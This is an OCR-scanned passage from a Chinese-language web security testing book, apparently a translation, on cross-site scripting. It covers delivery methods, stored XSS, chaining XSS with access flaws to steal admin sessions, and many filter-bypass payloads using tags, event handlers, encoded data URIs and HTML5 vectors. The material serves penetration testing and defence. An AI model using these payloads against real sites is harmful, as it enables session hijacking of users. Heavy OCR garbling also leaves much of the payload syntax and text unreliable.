5. 扩大 客户 端 攻击 范围 

攻击 者 可 以 采用 各 种 方式 直接 攻击 访问 一 个 Web 站 点 的 用 户 。 所 
有 这 些 攻 击 都 可 以 通过 易 受 攻击 的 应 用 程序 中 的 一 个 跨 站 点 脚本 漏洞 
传送 ， 当 然 ， 用 户 倘 然 访问 的 任何 恶意 站 点 也 可 以 直接 传达 它们 。 我 
们 会 在 第 13 章 的 最 后 详细 介绍 这 种 类 型 的 攻击 。 


12.2.3 XSS 传送 


确定 一 个 XSS 漏 洞 并 设计 出 利用 它 的 适当 有 效 载 荷 后 ， 攻 击 者 需 
要 找 出 办 法 同 应 用 程序 的 其 他 用 户 传送 攻击 。 我 们 在 前 面 已 经 讨论 了 
几 种 传送 方法 。 实 际 上 ， 攻 击 者 还 可 以 使 用 其 他 许多 传送 机 制 。 

1. 传送 反射 型 与 基于 OM 的 XSS 攻 击 

除了 通过 电子 邮件 癌 随 机 用 户 大 量 发 送 专 门 设计 的 URL 这 种 明显 
的 钓鱼 疝 量 外 ， 攻 击 者 还 可 以 尝试 使 用 以 下 机 制 传送 反射 型 或 基于 
DOM 的 XSS 攻 击 。 


口 在 有 针对 性 的 攻击 中 ， 攻 击 者 可 以 同 个 体 目标 用 户 或 少数 几 名 
用 户 发 送 一 封 伪造 的 电子 邮件 。 例 如 ， 可 以 同 管 理 员 发 送 一 封 明 显 由 
已 知 用 户 送 出 的 电子 邮件 ， 抱 怨 某 个 特殊 的 URL 造 成 错误 。 如 果 攻 击 
者 想 要 攻破 某 个 特殊 用 户 的 会 话 〈 而 非 截 取 随 机 用 户 的 会 话 ) ， 实 施 
合理 、 可 靠 的 针对 性 攻击 往往 是 最 有 效 的 传送 机 制 。 有 时 我 们 也 把 这 
RAEI MEY A” © 
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口 第 三 方 Web 站 点 上 的 内 容 与 代码 可 用 于 生成 触发 XSS 漏 洞 的 请 
求 。 各 种 常见 的 应 用 程序 允许 用 户 发 布 数 量 有 限 的 HTML 标 记 ， 这 些 
标记 将 按 原 样 回 其 他 用 户 显示 。 如 果 可 以 使 用 GET 方 法 触发 XSS 调 
洞 ， 攻 击 者 束 可 以 在 第 三 方 站 点 上 发 布 一 个 指向 某 有 恶意 URL 的 IMG 标 
签 ， 任 何 查看 以 上 第 三 方 内 容 的 用 户 将 在 不 知情 的 情况 下 请 求 该 恶意 


URL ° 

或 者 ， 攻 击 者 可 以 创建 自己 的 Web 站 点 ， 在 其 中 包含 诱 使 用 
户 访问 的 有 趣 内 容 ， 但 也 可 能 含有 一 些 脚本 ， 导 致 用 户 的 浏览 郁 
回 易 受 攻击 的 应 用 程序 提出 包 售 XSS 有 效 载 谷 的 请 求 。 如 果 某 用 
尸 登 录 以 上 易 受 攻击 的 应 用 程序 ， 并 且 磁 巧 浏览 了 攻击 者 的 站 
点 ， 该 用 户 访问 以 上 易 受 攻击 的 应 用 程序 的 会 话 将 被 攻破 。 

建立 适当 的 Web 站 点 后 ， 攻 击 者 可 以 使 用 搜索 引擎 操纵 技巧 
生成 某 些 用 户 提交 的 访问 ， 例 如 ， 将 相关 关键 字 放 入 站 点 内 容 中 
并 使 用 相关 表达 式 将 其 链接 到 相关 站 点 。 但 是 ， 这 种 传送 机 制 与 
和 


注意 ， 这 种 传送 机 制 使 得 攻击 者 可 利用 只 通过 POST 请 求 触发 
的 反射 型 与 基于 DOM 的 XSS 漏 洞 。 但 是 ， 利 用 这 些 漏洞 ， 攻 击 者 
明显 不 能 通过 向 受害 用 户 发 送 一 个 简单 的 URL 来 传送 一 次 攻击 。 
然而 ， 某 个 恶意 Web 站 点 可 能 包含 一 个 HTML 表 单 ， 它 使 用 POST 
方法 并 以 易 受 攻击 的 应 用 程序 作为 它 的 目标 URL。 其 页 面 上 的 
JavaScript 或 导航 控件 可 用 于 提交 表单 ， 成 功利 用 漏洞 。 


口 在 男 一 种 利用 第 三 方 Web 站 点 的 攻击 中 ， 一 些 攻击 者 付费 购买 
许多 链接 至 一 个 URL 的 横幅 广告 ， 该 URL 中 包含 一 个 针对 某 易 受 攻 击 
的 应 用 程序 的 XSS 有 效 载 集 。 如 果 一 名 用 户 登 录 这 个 易 受 攻击 的 应 用 
程序 ， 并 单 击 广告 ， 那 么 他 登录 该 应 用 程序 的 会 话 就 会 被 攻破 。 因 为 
许多 提供 商 使 用 关键 字 将 广告 分 配给 与 其 有 关 的 页 面 ， 有 时 就 会 出 现 
这 样 的 情况 : 一 个 攻击 特定 应 用 程序 的 广告 恰巧 被 分 配 在 这 个 应 用 程 
序 的 页 面 中 。 这 不 仅 提 高 了 攻击 的 可 信 性 ， 而 且 还 可 以 确保 在 攻击 者 
实施 攻击 时 ， 单 击 广告 的 用 户 正在 使 用 那个 易 受 攻击 的 应 用 程序 。 此 
外 ， 由 于 目标 URL 现 在 为 “本 站 点 ” URL， 该 攻击 能 够 避 开 用 于 防范 
XSS 的 基于 浏览 器 的 机 制 (将 在 本 章 后 面部 分 详细 介绍 ) 。 另 外 ， 由 
于 许多 横幅 广告 提供 商 按 点 击 率 收费 ， 这 种 技巧 使 得 攻击 者 能 够 “ 买 
进 ” 大 量 用 户 会 话 。 

口 许 多 应 用 程序 执行 一 种 “推荐 给 朋友 ?或 向 站 点 管理 员 发 送 反馈 
的 功能 。 这 种 功能 通常 允许 用 户 生成 一 封 电 子 邮件 ， 其 内 容 与 收 件 人 
均 可 上 自由 设置 。 攻 击 者 能 够 利用 这 种 功能 ， 通 过 一 封 实 际 源 自 上 自己 服 
务 器 的 电子 邮件 传送 XSS 攻 击 ， 提 高 邮件 被 技术 熟练 的 用 户 与 反 恶 意 
软件 的 软件 接受 的 可 能 性 。 

2. 传送 保存 型 XSS 攻 击 

保存 型 XSS 攻 击 共 有 两 种 传送 机 制 : 带 内 与 带 外 传送 机 制 。 

带 内 传送 机 制 适用 于 大 多 数 情 况 ， 这 时 漏洞 数据 通过 主 Web 界 面 
提交 给 应 用 程序 。 用 户 控制 的 数据 最 终 显示 给 其 他 用 户 的 常见 位 置 包 


口 个 人 信息 字段 ， 如 姓名 、 地 址 、 电 子 邮 件 、 电 话 等 ; 

口 文档 、 上 传 文件 及 其 他 数据 的 名 称 ; 

口 提交 给 应 用 程序 管理 员 的 反馈 或 问题 ; 

口 同 其 他 应 用 程序 用 户 传送 的 消 轧 、 注 释 、 问 题 等 ; 

口 记录 在 应 用 程序 日 志 中 ， 并 通过 浏 咒 句 显示 给 管理 员 的 任何 内 
容 ， 如 URL、 用 户 名 、HTTP Referer 、User-Agent 等 ; 

口 在 用 户 之 间 共 享 的 上 传 文件 内 容 。 


在 这 些 情况 下 ， 只 需 同 应 用 程序 页 面 提交 XSS 有 效 载 倚 ， 然 后 等 
待 受害 者 碍 看 恶意 代码 ， 藉 可 以 传送 XSS 有 效 载 何 。 

市 外 传送 机 制 适 用 于 通过 其 他 渠道 问 应 用 程序 提交 漏洞 数据 的 情 
况 。 应 用 程序 通过 这 种 渠道 接收 数据 ， 并 最 终 在 主 Web 界 面 生成 的 
HTML 页 面 中 显示 它 。 前 面 描述 的 针对 Web 邮 件 应 用 程序 的 攻击 束 是 
这 种 传送 机 制 的 典型 示例 。 这 种 攻击 同一 个 SMTP 服 务 喜 传送 恶意 数 


据 ， 并 最 终 在 一 条 HTML 格 式 的 电子 邮件 消 轧 中 辐 用 户 显 示 这 些 数 


据 

3. 链接 XsS 与 其 他 攻击 

XSsS 漏 洞 有 时 可 与 其 他 漏洞 链接 在 一 起 ， 造 成 破坏 性 的 后 果 。 笔 
者 曾 遇 到 一 个 应 用 程序 ， 它 的 用 户 昵 称 中 存在 一 个 保存 型 XSS 漏 洞 。 
这 个 数据 的 唯一 用 途 是 在 用 户 登 录 后 显示 一 条 个 性 化 欢迎 消息 。 该 昵 
称 从 不 向 其 他 应 用 程序 用 户 显 示 ， 因 此 ， 最 初 似乎 没有 任何 攻击 向 量 
会 致使 用 户 在 编辑 昵称 时 造成 问题 。 在 其 他 各 点 都 相同 的 情况 下 ， 这 
种 漏洞 属于 风险 极 低 的 漏洞 。 

但 是 ， 该 应 用 程序 还 存在 另 一 个 漏洞 。 由 于 访问 控制 存在 缺陷 ， 
任何 用 户 都 可 以 编辑 其 他 用 户 的 有 昵称。 同样 ， 这 个 问题 本 身 并 不 严 
重 。 有 哪个 攻击 者 会 对 修改 其 他 用 户 的 昵称 感 兴趣 呢 ? 

然而 ， 如 果 将 这 两 个 低 风 险 的 漏洞 链接 在 一 起 ， 攻 击 者 就 可 以 完 
全 控制 应 用 程序 。 首 先 ， 攻 击 者 只 需 设计 一 个 自动 攻击 ， 在 每 个 应 用 
程序 用 户 的 昵称 中 注入 一 段 脚本 。 每 次 用 户 登 录 应 用 程序 ， 这 段 脚本 
就 会 执行 ， 并 将 该 用 户 的 会 话 令 牌 传送 到 攻击 者 控制 的 服务 器 中 。 应 
用 程序 的 一 些 用 户 为 管理 员 ， 他 们 经 常 登录 ， 能 够 创建 新 用 户 并 修改 
其 他 用 户 的 权限 。 攻 击 者 只 需 等 待 一 名 管理 员 登 录 ， 动 持 管 理 员 的 会 
话 ， 然 后 升级 自己 的 账户 ， 获 得 管理 权限 。 因 此 ， 这 两 个 漏洞 同时 出 
现 会 给 应 用 程序 的 安全 造成 极 大 的 风险 。 

在 另 一 个 示例 中 ， 仅 向 提交 它们 的 用 户 显 示 的 数据 可 以 通过 跨 站 
请 求 伪造 攻击 (请 参阅 第 13 章 了 解 详细 信息 ) 进行 更 新 。 同 时 ， 应 用 
程序 中 还 包含 保存 型 XSS 漏 洞 。 同 样 ， 如 果 单 独 出 现 ， 这 两 个 漏洞 的 
风险 相对 较 低 。 但 是 ， 如 果 被 攻击 者 结合 在 一 起 加 以 利用 ， 它 们 就 可 
能 会 造成 严重 的 影响 。 


和 第 并 观点 “我 们 不 必 担 心 低 风 险 XSs 涯 洞 ， 用 户 只 能 利用 


它 攻击 他 们 自己 。” 

如 上 所 述 ， 在 适当 的 情况 下 ， 即 使 是 明显 低 风险 的 漏洞 ， 也 会 
为 更 具 破 坏 性 的 攻击 打下 基础 。 实 施 深层 安全 防御 必须 删除 每 一 个 
已 知 的 漏洞 ， 无 论 它 多 么 无 天 紧要 。 笔 者 束 兽 利用 XSS 在 页 面 啊 应 
中 插入 文件 浏览 器 对 话 框 或 AcitveX 控 件 ， 侵 入 与 目标 Web 应 用 程序 
绑 定 在 一 起 的 Kiosk 模 式 系统 。 在 想 出 办 法 利用 细微 漏洞 方面 ， 渗 透 


测试 员 应 该 始终 假定 攻击 者 比 目 己 更 主 有 想象 力 。 


确定 XSS 漏 洞 的 基本 方法 是 使 用 下 面 这 个 概念 验证 攻击 字符 串 : 
"><script>alert {document .cookie)</script> 


这 个 字符 串 被 提交 给 每 个 应 用 程序 页 面 中 的 每 一 个 参数 ， 同 时 ， 
攻击 者 监控 它 的 响应 ， 看 其 中 是 否 出 现 相同 的 字符 串 。 如 果 发 现 攻击 
字符 串 按 原样 出 现在 响应 中 ， 几 乎 可 以 肯定 应 用 程序 存在 XSS 漏 洞 。 

如 果 仅 仅 是 为 了 尽 可 能 快 地 确定 应 用 程序 中 存在 的 某 种 XSS 漏 
洞 ， 以 回 其 他 应 用 程序 用 户 实施 攻击 ， 那 么 这 个 基本 方法 可 能 是 最 为 
有 效 的 方法 ， 因 为 它 可 以 实现 高 度 目 动 化， 而 且 很 少 生 成 错误 警报 。 
但 是 ， 如 果 是 对 应 用 程序 进行 复杂 的 测试 ， 从 而 确定 尽 可 能 多 的 漏 
洞 ， 那 么 在 应 用 基本 方法 的 同时 ， 还 需要 组 合 使 用 更 加 复杂 的 技巧 。 
在 以 下 几 种 情况 下 ， 通 过 基本 的 检测 方法 可 能 无 法 确定 应 用 程序 中 存 
在 的 XSS 漏 洞 。 

口 许 多 应 用 程序 实施 基于 墨 名单 的 初步 过 滤 ， 试 图 阻止 XSS 攻 
击 。 通 常 ， 这 些 过 滤 在 请 求 参数 中 寻找 <script> 之 类 的 表达 式 ， 并 采取 
一 些 防 御 措施 ， 如 删除 或 编码 表达 式 ， 或 者 完全 阻止 这 类 请 求 。 基 本 
仿 测 方法 中 常用 的 攻击 字符 串 往往 被 这 些 过 小 阻止 。 但 是 ， 仪 仅 因 为 
一 个 常见 的 攻击 字符 串 被 阻止 ， 并 不 能 证 明 一 个 可 利用 的 漏洞 不 存 
在 。 如 后 文 所 述 ， 在 有 些 情 况 下 ， 不 使 用 <script> 标 签 ， 甚 至 不 使 用 "< 
> 和 /这 些 常 被 过 滤 掉 的 字符 ， 也 可 以 利用 XSS 漏 洞 。 

口 许多 应 用 程序 实施 的 防 XSS 过 滤 存 在 缺陷 ， 可 以 通过 各 种 方法 
避 开 。 例 如 ， 假 设 在 处 理 用 户 输入 前 ， 应 用 程序 删除 其 中 出 现 的 所 有 
<script> 标 签 。 这 意味 着 基本 方法 中 使 用 的 攻击 字符 串 将 不 会 在 应 用 程 
序 的 啊 应 中 返回 。 但 是 ， 以 下 一 个 或 几 个 字符 串 可 轻易 避 开 过 滤 ， 成 
功利 用 XSS 漏 洞 : 


"><script >alertidocument,.cookie}</script > 


"><ScRiPt>alert(document.cookie)</ScRiPt> 
"S$3eS3 cscriptézealert (document.cookie) $3c/scriptt3e 
"“><ser<script>ipt>alert (document. cookie) </scer</script>ipt> 


400"“><seript>alert (document .cookie) </script> 


尝试 访问 


http://mdsec.net/search/28/ 
http://mdsec.net/search/36/ 
http://mdsec.net/search/21/ 


注意 ， 在 这 些 情况 下 ， 在 服务 器 的 响应 中 ， 输 入 的 字符 串 返 回 
前 ， 可 能 经 过 净化 、 编 码 或 其 他 形式 的 修改 ， 因 而 还 不 足以 实现 对 
XSS 漏 洞 的 利用 。 这 时 ， 提 交 一 个 特殊 字符 串 并 检查 它 是 否 在 服务 怖 
的 啊 应 中 出 现 的 基本 检测 方法 将 无 法 成 功 发 现 漏洞 。 

当 利用 基于 DOM 的 XSS 漏 洞 时 ， 攻 击 有 效 载 丛 并 不 在 服务 絮 的 响 
应 中 返回 ， 而 是 保存 在 浏览 器 DOM 中 ， 并 可 被 客户 端 JavaScript 访 问 。 
同样 ， 在 这 种 情况 下 ， 提 交 一 个 特殊 字符 串 并 检查 它 是 否 在 服务 器 的 
啊 应 中 出 现 的 基本 检测 方法 将 无 法 成 功 发 现 漏洞 。 


要 探查 反射 型 XSS 漏 洞 ， 最 可 靠 的 方法 是 系统 性 地 检查 在 解析 应 
和 
下 步骤 
口 在 每 个 进入 点 提交 一 个 民 性 字母 字符 串 。 

口 确 定 此 字符 串 * 反 射 ? 在 应 用 程序 啊 应 中 的 所 有 位 置 。 

口 对 于 每 个 反射 ， 确 定 显示 反射 型 数据 时 的 语法 上 下 文 。 

7 a 
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口 WFR Ba ee EB, FRERET, MAAT 
解 并 避 开 应 用 程序 的 防御 性 过 滤 。 

1. 确认 用 户 输入 的 反射 

仿 测 反射 型 XSS 漏 洞 的 最 可 靠 方法 的 初始 步骤 与 前 面 描述 的 基本 
方法 类 似 。 


渗透 测试 步骤 


(1) 选择 任意 一 个 字符 串 ， 该 字符 串 不 曾 出 现在 应 用 程序 的 
任何 地 方 ， 而 且 其 中 仅 包 含 字 母 字 符 ， 因 此 不 可 能 受到 针对 XSS 过 
滤 的 影响 。 例如: 


提交 这 个 字符 串 ， 以 其 作为 每 个 页 面 的 每 一 个 参数 ， 且 每 次 只 
针对 一 个 参数 。 

(2) 监控 应 用 程序 的 啊 应 ， 看 其 中 是 否 出 现 同 一 个 字符 串 。 
记 下 参数 值 被 复制 到 应 用 程序 啊 应 中 的 每 一 个 参数 。 这 些 参数 不 一 
定 容 易 受 到 攻击 ， 但 需要 对 它们 进行 深入 分 析 ， 其 过 程 将 在 后 文中 


描述 。 

(3) 注意 ， 必 须 测试 所 有 GET 与 POST 请 求 ， 检 查 URL 查 询 字 
符 串 与 消息 主体 中 的 每 一 个 参数 。 虽 然 有 少数 XSS 漏 洞 传送 机 制 只 
a een 但 仍 有 可 能 对 漏洞 加 以 利用 ， 如 前 文 

述 。 

(4) 任何 时 候 ， 一 旦 在 POST 请 求 中 发 现 XSS， 应 使 用 Burp 中 
的 “更 改 请 求 方法 ”(change request method) 选项 确定 是 否 可 以 通过 
GET 请 求实 施 相同 的 攻击 。 

(5) 除 标准 的 请 求 参 数 外 ， 还 应 该 检测 HTTP 请 求 消 息 头 内 容 
被 应 用 程序 处 理 的 每 一 种 情况 。 有 一 种 常见 的 XSS 漏 洞 出 现在 错误 
消息 中 ， 这 时 Referer 与 User-Agent 消 息 头 之 类 的 数据 项 被 复制 到 消 
妃 的 内 容 中 。 这 些 消息 头 是 传送 反射 型 XSS 攻 击 的 有 效 工 具 ， 因 为 
攻击 者 可 以 使 用 一 个 Flash 对 象 诱 使 受害 者 提出 一 个 包含 任意 HTTP 
消息 头 的 请 求 。 


2. 测试 引入 脚本 的 反射 

渗透 测试 员 必 须 手 动 检查 已 确定 的 每 一 个 反射 型 输入 实例 ， 以 核 
实 其 是 否 确实 可 被 利用 。 在 啊 应 中 包含 反射 型 数据 的 每 个 位 置 ， 都 需 
要 确认 该 数据 的 语法 特点 。 这 时 ， 渗 透 测试 员 必 须 找到 某 种 修改 输入 


的 方法 ， 以 便 在 将 输入 复制 到 应 用 程序 啊 应 中 的 相同 位 置 时 ， 任 何 脚 
本 都 能 够 得 以 执行 。 下 面 分 析 这 方面 的 一 些 示 例 。 
e 例 1: 标签 属性 值 


假设 返回 的 页 面 中 包含 以 下 脚本 : 


<input type="text" name="addressl" value="myxsstestdmglwp"> 
很 明显 ， 利 用 XSS 的 一 种 方法 是 终止 包含 字符 串 的 双 引 号 ， 结 束 
<input> 标 签 ， 然 后 通过 其 他 方法 引入 JavaScript 脚 本 (使 用 <script> 
等 ) 例如 : 
SF 


"><script>alert(1)</script> 


在 这 种 情况 下 ， 男 一 种 可 以 避 开 某 些 输入 过 滤 的 利用 方法 ， 是 在 
<input> 标 签 内 注入 一 个 包含 JavaScript 的 事件 处 理 絮 。 例 如 : 


onfocus="alert(1) 


@ 例 2: JavaScript 4 
假设 返回 的 页 面 中 包含 以 下 脚本 : 


<script>var a = 'myxsstestdmqlwp'; var b = 123; . </script> 
这 时 ， 受 控制 的 字符 串 被 直接 插入 到 现 有 的 一 段 脚 本 中 。 要 利用 
XSS， 可 以 终止 字符 串 周 围 的 单 引 号 ， 用 

后 直接 处 理想 要 执行 的 JavaScript。 例 如 : 


NANE 


分 号 终止 整个 语句 ， 然 


[二 


注意 ， 因 为 已 经 终止 了 一 个 被 引用 的 字符 串 ， 为 阻止 JavaScript 解 
释 器 出 现 错误 ， 必 须 在 注入 的 代码 后 使 用 有 效 的 语法 确保 脚本 继续 正 
常 执行 。 在 这 个 示例 中 ， 变 量 foo 被 声明 ， 男 一 个 引用 字符 串 被 打开 ， 
它们 将 被 紧 随 在 字符 串 后 面 的 代码 终止 。 男 一 种 经 常 有 效 的 方法 是 使 
用 /结束 输入 ， 将 剩 下 的 脚本 当做 注释 处 理 。 

e 例 3: 包含 URL 的 特性 

假设 返回 的 页 面 中 包含 以 下 脚本 : 


<a href="myxsstestdmaqlwp">Click here ...</a> 
这 时 ， 受 控制 的 字符 串 插入 到 一 个 <a> 标 签 的 href 属 性 中 。 在 一 些 
浏 哎 絮 中， 这 个 属性 可 能 包含 一 个 使 用 javascript: 协 议 的 URL， 从 而 可 
以 使 用 以 下 脚本 直接 利用 XSS: 
javascript:alert(1); 
如 前 所 述 ， 因 为 输入 将 反射 到 标签 属性 中 ， 因 此 这 时 还 可 以 注入 
一 个 事件 处 理 需 。 
要 问 当 前 所 有 的 浏览 器 实施 攻击 ， 可 以 同时 使 用 一 个 无 效 的 图 像 
名 称 与 一 个 onerror 事 件 处 理 需 : 


#"onclick="jJavascript:alert(1) 


V ”提示 和 其 他 攻击 一 样 ， 渗 透 测 试 员 必 须 对 请 求 中 出 现 的 
任何 特殊 字符 进行 URL 编 码 ， 包 括 & = + ; 和 空格 。 


渗透 测试 步骤 


对 于 在 前 面 步骤 中 记 下 的 每 一 个 潜在 的 XSS 漏 洞 ， 采 取 以 下 措 


施 

(1) 检查 HTML 源 代码 ， 确 定 受 控制 的 字符 串 的 位 置 。 

(2) 如 果 字 符 串 出 现在 几 个 位 置 ， 应 将 每 个 位 置 当做 一 个 潜 
在 的 漏洞 ， 分 别 进行 分 析 。 

(3) 根据 用 户 控制 的 字符 串 在 HIML 中 的 位 置 ， 确 定 需 要 如 何 
对 其 进行 修改 以 使 任意 JavaScript 得 以 执行 。 通 和 党， 有 大 量 方法 可 成 
为 传送 攻击 的 有 效 工具 。 

(4) 向 应 用 程序 提交 设计 的 字符 串 ， 测 试 它 是 否 有 用 。 如 果 
设计 的 字符 串 仍 然 按 原样 返回 ， 表 示 应 用 程序 存在 XSS 汤 洞 。 使 用 
一 段 概念 验证 脚本 显示 一 个 警报 对 话 框 ， 重 复 检查 语法 是 否 正确 ， 
并 确定 啊 应 显示 时 ， 对 话 框 是 否 出 现在 浏览 器 中 。 


3. 探查 防御 性 过 滤 

通 肖 情况 下 最 初 提 交 的 攻击 字符 串 并 不 会 被 服务 右 按 原样 返回 ， 
因而 无 法 成 功 执 行 注入 的 JavaScript。 如 果 是 这 样 ， 不 要 放弃 ! 接 下 来 
应 该 确定 服务 器 对 输入 进行 了 哪些 处 理 。 主 要 有 以 下 3 种 可 能 的 情况 。 
口 应 用 程序 或 者 Web 应 用 程序 防火 墙 傈 护 的 应 用 程序 发 现 一 个 攻 
击 签名 ， 完 全 阻止 了 输入 。 
更 口 应 用 程序 已 经 接受 了 输入 ， 但 对 攻击 字符 串 进行 了 某 种 净化 或 
编码 。 


口 应 用 程序 把 攻击 字符 串 截 短 至 某 个 固定 的 最 大 长 度 。 

我 们 将 分 别 分 析 每 一 种 情况 ， 并 讨论 如 果 通 过 每 种 方法 避 开 应 用 
程序 设立 的 障碍 。 

4. 避 开 基于 签名 的 过 滤 

在 第 一 种 类 型 的 过 滤 中 ， 应 用 程序 通常 会 对 攻击 子 符 串 做 出 与 无 
害 字 符 串 截然 不 同 的 啊 应 ， 例 如 ， 通 过 一 条 错误 消息 ， 甚 至 会 指出 发 
现 一 个 可 能 的 XSS 攻 击 ， 如 图 12-8 所 示 。 


Server Error in '/’ Application. 


A potentially dangerous Request.Form value was detected from the client 

(searchbox='<asp"). 

Description: Regest Vaidsbon has cetected s potertely dangerous cient nowt value, and processing of the request has eer aborted This valje may 
ie plo 


Hecate © etlempt to oorprom oo the Security of vou Gop—iosfion, cuch at a crore cle Sorgting stleck You cor doable requert valdatior by cetting 
vaboibeReque st=teise in the Page cirectve of in the configuretion section. However, tis strongly reccommended thal you applicstion expicilly check al 
ule in tra O85 


Exception Details: Svaen Web MpRequest elas cnException A potentialy dangerous Request Form valve woe cktecied from the cheng 
(seere sHsp") 


Source Error 


An unhandled exception was Generated during the #xecution of the current web recuest. 
information regarding the origin and location of the exception can be identifica using the 
exception stack trace belov. 


Stack Trace: 


图 12-8 ”一 条 由 ASPNET 反 XSS 过 滤器 生成 的 错误 消息 


如 打出 现 这 种 情况 ， 那 么 接 下 来 ， 应 该 确定 输入 中 的 哪些 字符 或 
表达 式 触 发 了 过 滤 。 一 种 有 效 的 方法 是 轮流 删除 字符 串 的 不 同 部 分 ， 
看 输入 是 否 仍然 家 阻止 。 通 常 ， 使 用 这 种 方法 可 迅速 碍 明 走 否 是 某 个 
特殊 的 表达 式 (如 <script>) 造成 请 求 被 阻止 。 如 有 果 确 实 如 此 ， 那 么 需 
要 对 过 滤 进 行 测试 ， 看 是 否 有 任何 避 开 过 滤 的 办 法 。 

有 各 种 不 同 的 方法 可 以 在 HTML 页 面 中 引入 脚本 代码 ， 这 些 方法 
通常 能 够 避 开 基于 签名 的 过 滤 。 因 此 ， 测 试 员 要 么 找到 引入 脚本 的 其 
他 方法 ， 要 么 使 用 浏 贤 絮 接受 的 上 略 显 畸形 的 语法 。 在 这 一 节 中 ， 我 们 
将 介绍 各 种 执行 脚本 的 不 同方 法 ， 然 后 说 明 一 系列 可 用 于 避 开 常用 过 
滤 的 技巧 。 

@ 引入 脚本 代码 的 方法 

有 4 种 不 同 的 方法 可 用 于 在 HTML 页 面 中 引入 脚本 代码 。 我 们 将 逐 
ee eee 
TIRIN o 


TÒ 注解 浏览 器 对 于 各 种 HTML 和 脚本 语法 的 支持 各 不 相同 。 


个 体 浏览 器 的 行为 也 往往 会 随 着 新 版 本 的 发 布 而 发 生 改变 。 因 此 ， 
任何 针对 个 体 浏 览 絮 行为 的 “明确 ”指南 也 很 快 会 过 时 。 但 是 ， 从 安 


全 的 角度 看 ， 应 用 程序 需要 在 所 有 当前 和 最 新 版 本 的 常用 浏 贤 硕 中 
可 靠 运 行 。 如 有 果 XSS 攻 击 只 能 通过 仅 由 少数 用 户 使 用 的 特定 浏览 需 


进行 传送 ， 这 仍然 构成 一 个 漏洞 ， 应 对 其 予以 修复 。 到 本 书 截稿 时 
止 ， 本 划 中 提供 的 所 有 示例 至 少 能 够 在 某 种 注 流 浏览 器 上 运行 。 

为 便于 参考 ， 本 章 于 2011 年 3 月 援 写 ， 所 有 描述 的 攻击 至 少 能 
TELA F APD bt ats ESET: 

g Internet Explorer 版 本 8.0.7600.16385 ; 

g Firefox 版 本 3.6.15 ° 


o 脚本 标 等 
除 直 接 使 用 <script> 标 签 外 ， 还 可 以 通过 各 种 方法 、 使 用 复杂 的 语 
法 来 隐 泸 标签 ， 从 而 避 开 有 某 些 过 滤 : 


<object Gata="dGata:text/html,<script>alert (1) </ 


<object Gata="data:text/html; base64, PHN) cmlwdDShbGVydCgoxKTwvc2NyaxBCPg=="> 


<a hrei="*data:text/html; baseé4, PHN] cmlwdGDShbGVydCexkKTwvc2NyaxBOPgq=="> 


Click here</a> 


上 例 中 的 基于 Base64 的 字符 串 为 : 
<script>alert (1)</script> 


V 事件 处 理 右 
有 大 量 事件 处 理 器 可 与 各 种 标签 结合 使 用 ， 以 用 于 执行 脚本 。 以 
下 是 一 些 较 为 少见 的 示例 ， 可 在 不 需要 任何 用 户 交 互 的 情况 下 执行 脚 


本 : 


<xml onreadystatecnange=alert [1)> 
<style onreadystatechange-alert (1}> 
<iframe onreadystatechange-alert(i}> 
<object onerror=alert({1)> 


<object type=image srce=valid,cif onreadystatechange=alert {1)></object> 


<img type=image src=valic.gif onreadystatechange=alert({1)> 


<input type=imace sre=valid.gif onreadystatechange=alert(i)> 
<isindex type=image src=-valid.gif onreadystatecnange-alert({1)> 
<script onreadystatechange=alert(1)> 

<bgsound onpropertychange=alert (1}> 

<body onbeforeactivate=alert(i}> 

<body onactivate=alert(1)> 

<body onfocusin=alert{1)> 


HTML5 使 用 事件 处 理 器 提供 了 大 量 向 量 。 这 包括 使 用 autofocus 属 
性 自动 触发 之 前 需要 用 户 交 互 的 事件 : 


<input autofocus onfocus=alert(1)> 
<input onblur=alert({1) autofocus><input autofocus> 
<body onscroll=alert(1)><br><br>...<br><input autofocus> 


它 允 许 在 结束 标签 中 使 用 事件 处 理 天 


</a onmousemove=alert(1)> 
最 后 ，HTML5 还 通过 事件 处 理 絮 引入 了 新 标签 : 


<video src=1 onerror=alert(1)> 
<audio src=1 onerror=alert(1)> 


V 脚本 伪 协 议 
脚本 伪 协 议 可 用 在 各 种 位 置 ， 以 在 需要 URL 的 属性 中 执行 行内 脚 
本 。 以 下 是 一 些 示例 : 


<object data=javascript:alert(i)> 
<iframe src=javascript:alert(1)> 
<embed src=javascript:alert(1)> 


虽然 上 面 的 示例 主要 使 用 的 是 javascript 伪 协议 ， 但 是 ， 还 可 以 在 
Internet Explorer 上 使 用 vbs 协 议 ， 如 本 章 后 面部 分 所 述 。 
和 事件 处 理 需 一样 ，HTML5 也 提供 一 些 在 XSS 攻 击 中 使 用 脚本 伪 
协议 的 新 方法 : 
<form id=test /><button form=test formaction=javascript:alert {1}> 


<event.-source src-javascript:alert{1)> 


在 bt ct 才 滤 进行 攻击 时 ， 新 的 event-source 标 签 特 别 有 用 。 与 
之 前 的 任何 HITML5 标 签 不 同 ， 它 的 名 称 中 包含 一 个 连 字 符 ， 因 此 ， 使 
用 这 个 标签 可 以 避 开 传统 的 、 认 为 标签 名 称 只 能 包含 字母 的 基于 正则 
表达 式 的 过 滤 。 

V 动态 求 值 的 样式 

一 些 浏览 器 支持 在 动态 求 值 的 CSS 样 式 中 使 用 JavaScript。 以 下 示 
例 可 以 在 IE7 及 其 早期 版 本 上 执行 ， 如 果 在 兼容 模式 下 运行 ， 还 可 以 在 
后 续 版 本 上 执行 : 


<x style=x:expression({alert(1))> 


最 新 版 本 的 下 不 再 文 持 上 述 语 法 ， 因 为 这 些 语 法 只 能 用 在 XSS 攻 
击 中 。 但 是 ， 在 最 新 版 本 的 正中， 使 用 以 下 请 求 可 以 达到 同样 的 效 
R: 


<x style=behavior:url(#default#time2} onbegin=alert(1)> 


{E HH Firefox] bias A) LA jHiwtmoz-binding 1E Sc jt F CSSA 
击 ， 但 是 ， 由 于 应 用 程序 已 对 这 一 功能 实施 了 限制 ， 现 在 已 经 无 法 通 
过 它 来 实施 XSS 攻 击 。 

vV 避 开 过 滤 : HTML 

在 前 面 儿 季 中 ， 我 们 介绍 了 各 种 可 用 于 在 HTML 页 面 中 执行 脚本 
代码 的 方法 。 许 多 时 候 ， 你 会 发 现 ， 通 过 采用 不 同 的 、 较 为 少见 的 脚 
本 执行 方法 ， 就 可 以 避 开 基于 签名 的 过 滤 。 如 有 果 这 种 方法 失败 ， 你 就 
需要 寻找 其 他 隐藏 攻击 的 方法 。 通 剃 ， 你 可 以 引入 过 滤器 接受 的 异常 
语法 ， 并 使 浏览 絮 接 受 返 回 的 输入 。 在 本 广 中 ， 我 们 将 介绍 各 种 对 
